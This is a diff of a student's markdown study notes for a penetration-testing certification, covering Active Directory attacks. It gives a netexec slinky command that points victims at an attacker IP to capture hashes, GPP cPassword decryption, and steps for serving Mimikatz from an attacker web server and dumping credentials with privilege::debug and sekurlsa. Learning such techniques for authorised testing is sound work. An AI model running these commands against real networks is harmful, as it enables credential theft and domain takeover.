PTRIGGS1775/HackingNotes/PNPT_Notes/6_ActiveDirectory.md

 ````bash
 netexec smb {target IP} -d {domain}.local -u {target user} -p {target password} -M slinky -o NAME=test SERVER={attacker IP}
 ````

+### GPP Attacks
+An old attack that relies on a default password loaded into the DC.
+It will be listed as a jumbled string and cPassword in a gpp xml file (Possibly named groups.xml). `gpp-decrypt {complex string of cPassword values "dafhajksdhfjkasdh/asdhfkjahdsfkjhadf"}`

+### Mimikatz
+This attack only works if you have access to the machine.
+So this is a post compromise attack.
+Also, big also, virus protection needs to be disabled.

+You need to load the mimikatz tool onto the target machine and run mimikatz.

+1. Typing `mimikatz` in kali will show you where the files are located.

+2. Once you've identified the location cd into that directory and setup a python webserver `python3 -m http.server 8080`.

+3. From the target machine navigate to http://{attacker IP[:port]}

+4. Download the (4) files.

+5. From the target machine, run a cmd.exe as administrator, navigate to the folder with the (4) downloaded mimikatz files, run `mimikatz.exe`.

+6. From there use the tool to complete the attack.
+Some plases to start
+    - Set privelege mode to debug `privilege::debug`
+    - `sekurlsa::` This will show you what tools are available.

+## Active Directory: Post-domain pwning